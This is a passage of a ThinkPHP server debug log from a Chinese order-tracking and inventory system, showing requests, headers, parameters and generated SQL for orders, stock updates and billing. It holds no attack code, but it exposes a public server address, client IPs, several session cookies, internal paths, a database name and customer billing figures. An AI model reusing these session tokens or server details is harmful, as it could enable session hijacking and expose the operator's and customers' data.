e`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308283>orderinfo.end_time desc,1658308283>orderinfo.end_time desc,1658308283-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 40,10 [ RunTime:0.002440s ] --------------------------------------------------------------- [ 2022-07-20T17:11:23+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018683s][吞吐率:53.52req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001084s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:28+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.032982s][吞吐率:30.32req/s] [内存消耗:3,334.09kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001838s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:28+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020169s][吞吐率:49.58req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001079s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:29+08:00 ] 106.112.205.110 GET /admin/index/login?url=%2F [ info ] 47.105.33.115:8081/admin/index/login?url=%2F [运行时间:0.034174s][吞吐率:29.26req/s] [内存消耗:3,840.52kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001220s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.003672s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000089s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:30+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=index&v=1658308289 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=index&v=1658308289 [运行时间:0.033319s][吞吐率:30.01req/s] [内存消耗:3,856.21kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/index/login?url=%2F', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'index', 'v' => '1658308289', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001873s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:34+08:00 ] 221.192.178.45 POST /api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6618&rukuliang=4090&fpsl=0 [ info ] 47.105.33.115:8081/api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6618&rukuliang=4090&fpsl=0 [运行时间:0.077780s][吞吐率:12.86req/s] [内存消耗:5,065.74kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001084s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'updaterukuliangbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'orderId' => '6618', 'rukuliang' => '4090', 'fpsl' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001511s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->updaterukuliangbyid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000430s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001373s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000578s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001673s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `id` = 6618 LIMIT 1 [ RunTime:0.000506s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001137s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1267 LIMIT 1 [ RunTime:0.000561s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `kucun`=4090,`updatetime`=1658308294 WHERE `id` = 1267 [ RunTime:0.000324s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001687s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,parentproductinfo.id AS parentproductinfo__id,parentproductinfo.product_avatar AS parentproductinfo__product_avatar,parentproductinfo.name AS parentproductinfo__name,parentproductinfo.product_num AS parentproductinfo__product_num,parentproductinfo.kucun AS parentproductinfo__kucun,parentproductinfo.takeup_kucun AS parentproductinfo__takeup_kucun,parentproductinfo.staff_ids AS parentproductinfo__staff_ids,parentproductinfo.staff_names AS parentproductinfo__staff_names,parentproductinfo.pid AS parentproductinfo__pid,parentproductinfo.corresponding_num AS parentproductinfo__corresponding_num,parentproductinfo.position AS parentproductinfo__position,parentproductinfo.price AS parentproductinfo__price,parentproductinfo.factorymge_id AS parentproductinfo__factorymge_id,parentproductinfo.product_status AS parentproductinfo__product_status,parentproductinfo.admin_id AS parentproductinfo__admin_id,parentproductinfo.createtime AS parentproductinfo__createtime,parentproductinfo.updatetime AS parentproductinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_productinfo` `parentproductinfo` ON `orderinfo`.`pProductinfo_id`=`parentproductinfo`.`id` WHERE `orderinfo`.`pid` = '6618' AND ( order_status!= '6' ) [ RunTime:0.004348s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001678s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001378s ] [ sql ] [ SQL ] SELECT `purchaseorder`.`id`,`purchaseorder`.`number`,`purchaseorder`.`supplier_factory_id`,`purchaseorder`.`sup_order_id`,`purchaseorder`.`material_id`,`purchaseorder`.`orderinfo_id`,`purchaseorder`.`order_amount`,`purchaseorder`.`kucun_amount`,`purchaseorder`.`amount`,`purchaseorder`.`lingqu_amount`,`purchaseorder`.`daohuo_amount`,`purchaseorder`.`price`,`purchaseorder`.`suppliercustomer_id`,`purchaseorder`.`factorymge_id`,`purchaseorder`.`admin_id`,`purchaseorder`.`order_status`,`purchaseorder`.`build_time`,`purchaseorder`.`remind_day`,`purchaseorder`.`end_time`,`purchaseorder`.`responsible_staffinfos`,`purchaseorder`.`responsible_staffinfovars`,`purchaseorder`.`bind_pro_id`,`purchaseorder`.`bind_mat_id`,`purchaseorder`.`beizhu`,`purchaseorder`.`feedback`,`purchaseorder`.`order_type`,`purchaseorder`.`guoqitime`,`purchaseorder`.`guoqi_status`,`purchaseorder`.`createtime`,`purchaseorder`.`updatetime`,`purchaseorder`.`is_modify`,material.id AS material__id,material.name AS material__name,material.number AS material__number,material.avatar AS material__avatar,material.amount AS material__amount,material.warn_amount AS material__warn_amount,material.occupy_amount AS material__occupy_amount,material.factorymge_id AS material__factorymge_id,material.is_stop_status AS material__is_stop_status,material.admin_id AS material__admin_id,material.price AS material__price,material.danwei AS material__danwei,material.quehuo_status AS material__quehuo_status,material.put_position AS material__put_position,material.is_has_sup AS material__is_has_sup,material.staff_ids AS material__staff_ids,material.staff_names AS material__staff_names,material.createtime AS material__createtime,material.updatetime AS material__updatetime,material.is_delete AS material__is_delete,bindmaterial.id AS bindmaterial__id,bindmaterial.name AS bindmaterial__name,bindmaterial.number AS bindmaterial__number,bindmaterial.avatar AS bindmaterial__avatar,bindmaterial.amount AS bindmaterial__amount,bindmaterial.warn_amount AS bindmaterial__warn_amount,bindmaterial.occupy_amount AS bindmaterial__occupy_amount,bindmaterial.factorymge_id AS bindmaterial__factorymge_id,bindmaterial.is_stop_status AS bindmaterial__is_stop_status,bindmaterial.admin_id AS bindmaterial__admin_id,bindmaterial.price AS bindmaterial__price,bindmaterial.danwei AS bindmaterial__danwei,bindmaterial.quehuo_status AS bindmaterial__quehuo_status,bindmaterial.put_position AS bindmaterial__put_position,bindmaterial.is_has_sup AS bindmaterial__is_has_sup,bindmaterial.staff_ids AS bindmaterial__staff_ids,bindmaterial.staff_names AS bindmaterial__staff_names,bindmaterial.createtime AS bindmaterial__createtime,bindmaterial.updatetime AS bindmaterial__updatetime,bindmaterial.is_delete AS bindmaterial__is_delete,bindproduct.id AS bindproduct__id,bindproduct.product_avatar AS bindproduct__product_avatar,bindproduct.name AS bindproduct__name,bindproduct.product_num AS bindproduct__product_num,bindproduct.kucun AS bindproduct__kucun,bindproduct.takeup_kucun AS bindproduct__takeup_kucun,bindproduct.staff_ids AS bindproduct__staff_ids,bindproduct.staff_names AS bindproduct__staff_names,bindproduct.pid AS bindproduct__pid,bindproduct.corresponding_num AS bindproduct__corresponding_num,bindproduct.position AS bindproduct__position,bindproduct.price AS bindproduct__price,bindproduct.factorymge_id AS bindproduct__factorymge_id,bindproduct.product_status AS bindproduct__product_status,bindproduct.admin_id AS bindproduct__admin_id,bindproduct.createtime AS bindproduct__createtime,bindproduct.updatetime AS bindproduct__updatetime FROM `ot_purchaseorder` `purchaseorder` LEFT JOIN `ot_material` `material` ON `purchaseorder`.`material_id`=`material`.`id` LEFT JOIN `ot_material` `bindmaterial` ON `purchaseorder`.`bind_mat_id`=`bindmaterial`.`id` LEFT JOIN `ot_productinfo` `bindproduct` ON `purchaseorder`.`bind_pro_id`=`bindproduct`.`id` WHERE `orderinfo_id` = 6618 AND `order_status` IN (1,2) AND `order_type` = 4 [ RunTime:0.000987s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `produced_amount`=4090,`waste_amount`=0,`produced_time`=1658308294,`order_status`='3',`updatetime`=1658308294 WHERE `id` = 6618 [ RunTime:0.000547s ] --------------------------------------------------------------- [ 2022-07-20T17:11:34+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.053757s][吞吐率:18.60req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001107s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001638s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000482s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001416s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000425s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001569s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001141s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308294>orderinfo.end_time desc,1658308294>orderinfo.end_time desc,1658308294-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002531s ] --------------------------------------------------------------- [ 2022-07-20T17:11:34+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021161s][吞吐率:47.26req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001190s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:35+08:00 ] 106.112.205.110 POST /admin/financial/verifybill/hedui/ids/1759?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1759?dialog=1 [运行时间:0.197311s][吞吐率:5.07req/s] [内存消耗:6,209.78kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001199s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '1170', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1759?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '黄', 1 => '152', ), 'verify_amount' => array ( 0 => '5040', 1 => '5040', 2 => '10304', 3 => '10304', 4 => '5016', 5 => '5016', 6 => '10080', 7 => '8448', ), 'price' => array ( 0 => '4.4', 1 => '1.9', 2 => '1.4000000000', 3 => '0.6', 4 => '2.6400000000', 5 => '1.5', 6 => '0.6', 7 => '0.6', ), 'money' => array ( 0 => '22176', 1 => '9576', 2 => '14425.6000000000', 3 => '6182.4', 4 => '12487.2', 5 => '7524', 6 => '6048', 7 => '5068.8', ), 'explain' => array ( 0 => '320w-14底壳5040个', 1 => '320W-9上盖5040个', 2 => '20W-5底壳T1.010304个', 3 => '20W-5上盖10304个', 4 => '200W-14底壳切口5016个', 5 => '200W-8网盖5016个', 6 => '320W-6散热器10080个', 7 => '200W-8散热器8448个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'shoukuan_status-5' => '0', 'shoukuan_status-6' => '0', 'shoukuan_status-7' => '0', 'shoukuan_status-8' => '0', 'ids' => '1759', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001651s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008381s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000538s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001430s ] [ sql ] [ SQL ] SELECT 